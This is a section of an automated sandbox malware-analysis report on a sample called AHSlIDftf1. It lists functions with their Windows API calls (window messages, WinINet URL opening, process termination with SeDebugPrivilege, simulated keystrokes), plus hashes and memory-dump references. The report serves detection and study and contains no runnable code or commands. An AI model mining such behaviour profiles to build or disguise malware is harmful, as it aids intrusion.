                                                                                                            • Opcode ID: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
                                                                                                            • Instruction ID: 7db796edf2df819a5b1da6a5896062f49d79c4e0b3ea3580921e49f4c7d51e8d
                                                                                                            • Opcode Fuzzy Hash: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
                                                                                                            • Instruction Fuzzy Hash: 141106776C8706F9F6112224DC07DF7379CCB44764B20501AFB0AF90E5FA65A8425A34
                                                                                                            Function 00D8CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282221369-0
                                                                                                            • Opcode ID: 8ae382b96fe58076ef0f599cbb58c1a63ab659a186c873b9ac7b93ae3523ff34
                                                                                                            • Instruction ID: 3b3b821d08689da1b2b76fb4aed18d1e337cb9ba9b012c154371b94468b091b7
                                                                                                            • Opcode Fuzzy Hash: 8ae382b96fe58076ef0f599cbb58c1a63ab659a186c873b9ac7b93ae3523ff34
                                                                                                            • Instruction Fuzzy Hash: 33610671906305EFEB31BFB59881A797BAAEF05310F19416EFA44A72C2D73599028B70
                                                                                                            Function 00DE50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00DE5186
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00DE51C7
                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00DE51CD
                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00DE51D1
                                                                                                              • Part of subcall function 00DE6FBA: DeleteObject.GDI32(00000000), ref: 00DE6FE6
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE520D
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE521A
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DE524D
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00DE5287
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00DE5296
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 3210457359-0
                                                                                                            • Opcode ID: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
                                                                                                            • Instruction ID: 37e568a9aa3f5b548a0315a29d235cb88a211a17f5e75e151ed5ce3c4f40cb26
                                                                                                            • Opcode Fuzzy Hash: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
                                                                                                            • Instruction Fuzzy Hash: 7B51C530A50B88BFEF20BF26EC45BD93B65FB053A9F184011F6199A2E5C3719980DB71
                                                                                                            Function 00D68B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DA6890
                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DA68A9
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DA68B9
                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DA68D1
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DA68F2
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA6901
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DA691E
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA692D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268354404-0
                                                                                                            • Opcode ID: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
                                                                                                            • Instruction ID: 29a02c88fca5da0436271ae2411579a3ceda566149e1b7d669506f5e1a359919
                                                                                                            • Opcode Fuzzy Hash: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
                                                                                                            • Instruction Fuzzy Hash: 9D519B70600309EFDB20DF29CC95FAA77B5EB58750F184618F956E72A0DB70E981EB60
                                                                                                            Function 00DCC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC182
                                                                                                            • GetLastError.KERNEL32 ref: 00DCC195
                                                                                                            • SetEvent.KERNEL32(?), ref: 00DCC1A9
                                                                                                              • Part of subcall function 00DCC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
                                                                                                              • Part of subcall function 00DCC253: GetLastError.KERNEL32 ref: 00DCC322
                                                                                                              • Part of subcall function 00DCC253: SetEvent.KERNEL32(?), ref: 00DCC336
                                                                                                              • Part of subcall function 00DCC253: InternetCloseHandle.WININET(00000000), ref: 00DCC341
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 337547030-0
                                                                                                            • Opcode ID: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
                                                                                                            • Instruction ID: 83e04053a39b0b0d4a14b667127e80fe7a7db406c62b1d6a0194c2989d53b910
                                                                                                            • Opcode Fuzzy Hash: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
                                                                                                            • Instruction Fuzzy Hash: B5318971620742AFDB21AFA59C44F66BBE9FF18300B08641DFA5ACB610D730E8119BB0
                                                                                                            Function 00DB25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
                                                                                                              • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
                                                                                                              • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25BD
                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DB25DB
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DB25DF
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25E9
                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DB2601
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DB2605
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB260F
                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DB2623
                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DB2627
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2014098862-0
                                                                                                            • Opcode ID: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
                                                                                                            • Instruction ID: 8cd968a8ffe35e360e955a97c6b0ee0b8d798da51f9d4bed2b6ad9421039a9c9
                                                                                                            • Opcode Fuzzy Hash: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
                                                                                                            • Instruction Fuzzy Hash: B90124313A0350BBFB2077688CCAF9A3F59DB5EB12F101001F318EE1E1C9E264458A79
                                                                                                            Function 00DB1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DB1449,?,?,00000000), ref: 00DB180C
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1813
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1828
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00DB1449,?,?,00000000), ref: 00DB1830
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1833
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1843
                                                                                                            • GetCurrentProcess.KERNEL32(00DB1449,00000000,?,00DB1449,?,?,00000000), ref: 00DB184B
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB184E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00DB1874,00000000,00000000,00000000), ref: 00DB1868
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1957940570-0
                                                                                                            • Opcode ID: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
                                                                                                            • Instruction ID: 3760fb401c22eb0ecf4b72443a2f70efbe500a214e995064efe50c1a50e7d2fc
                                                                                                            • Opcode Fuzzy Hash: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
                                                                                                            • Instruction Fuzzy Hash: 4801BBB5250348BFE710ABA5DC8DF6B3BACEB89B11F405411FA05DF2A1CA709801CB30
                                                                                                            Function 00DDA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DBD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
                                                                                                              • Part of subcall function 00DBD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
                                                                                                              • Part of subcall function 00DBD4DC: CloseHandle.KERNEL32(00000000), ref: 00DBD5DC
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA16D
                                                                                                            • GetLastError.KERNEL32 ref: 00DDA180
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA1B3
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DDA268
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00DDA273
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDA2C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                            • Opcode ID: d2d057c254288d3d366fbc62cd2f02fe58317bd2263bb8d436c6ecd3d90f77d7
                                                                                                            • Instruction ID: b65b620e6011d131219a4b26c977031c5a8f2ec67cdc0e3bbff8eefeeb3aefcd
                                                                                                            • Opcode Fuzzy Hash: d2d057c254288d3d366fbc62cd2f02fe58317bd2263bb8d436c6ecd3d90f77d7
                                                                                                            • Instruction Fuzzy Hash: 8D618C302093429FD710DF19C894F16BBE1AF44318F58C49DE8668B7A2C772ED49CBA2
                                                                                                            Function 00DE3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DE3925
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DE393A
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DE3954
                                                                                                            • _wcslen.LIBCMT ref: 00DE3999
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DE39C6
                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DE39F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                            • String ID: SysListView32
                                                                                                            • API String ID: 2147712094-78025650
                                                                                                            • Opcode ID: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
                                                                                                            • Instruction ID: c3a85fe8f90be1d95c1dd3464c728e6d05af6906c61d94922f81eac1f9da8c09
                                                                                                            • Opcode Fuzzy Hash: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
                                                                                                            • Instruction Fuzzy Hash: 3641C671A00358ABDF21AF65CC89BFA77A9EF08350F140126F958E7291D771DA80CBB0
                                                                                                            Function 00DBBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DBBCFD
                                                                                                            • IsMenu.USER32(00000000), ref: 00DBBD1D
                                                                                                            • CreatePopupMenu.USER32 ref: 00DBBD53
                                                                                                            • GetMenuItemCount.USER32(013E57E8), ref: 00DBBDA4
                                                                                                            • InsertMenuItemW.USER32(013E57E8,?,00000001,00000030), ref: 00DBBDCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                            • String ID: 0$2
                                                                                                            • API String ID: 93392585-3793063076
                                                                                                            • Opcode ID: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
                                                                                                            • Instruction ID: cd1d7eb5582d681c2c6f1b2fe9f07fb8508ee71530e1a9d218750051a1acf322
                                                                                                            • Opcode Fuzzy Hash: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
                                                                                                            • Instruction Fuzzy Hash: EE517970A00205DBDB20DFA8D884BEEBBF4EF45324F18421AE4539B290E7B89941CB71
                                                                                                            Function 00DBC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00DBC913
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconLoad
                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                            • API String ID: 2457776203-404129466
                                                                                                            • Opcode ID: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
                                                                                                            • Instruction ID: 9e52665612114ae79edce44d11745a303e8dcb42909ea8c749ba11597e871374
                                                                                                            • Opcode Fuzzy Hash: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
                                                                                                            • Instruction Fuzzy Hash: 03112B35699306FBFB015B149C82CEA279CEF15319B60602BF505E62C2E7609D405674
                                                                                                            Function 00DBED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 952045576-0
                                                                                                            • Opcode ID: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
                                                                                                            • Instruction ID: 11a762f2c27edc6902b4d75f290bdf52484a0bf4528e98dcd565c5d4fd5967b8
                                                                                                            • Opcode Fuzzy Hash: ceafeafc391e9b64c0d6db14d33ba36424a8f47980419781e64660fb2a4b1036
                                                                                                            • Instruction Fuzzy Hash: CF41A265D10218B6CB11EBF4888A9CFB7B8EF45310F508566F519E3122FB34E245C7BA
                                                                                                            Function 00D6F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00D6F953
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF3D1
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DAF454
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268545403-0
                                                                                                            • Opcode ID: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
                                                                                                            • Instruction ID: 3465206ee7d0f75dbe590554edc7187c13b3d6048e88a4aecf3121e015c8622c
                                                                                                            • Opcode Fuzzy Hash: 87959d85c0c767dd7ab7106c8061ab2183cc3099cfcd2f04096d1e1af5f1b0de
                                                                                                            • Instruction Fuzzy Hash: A8412D31508B80BFD7399B69E8C872E7B91AB56314F1C447EE0D756660C671D881CF31
                                                                                                            Function 00DE2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DE2D1B
                                                                                                            • GetDC.USER32(00000000), ref: 00DE2D23
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DE2D2E
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00DE2D3A
                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DE2D76
                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DE2D87
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DE5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00DE2DC2
                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DE2DE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
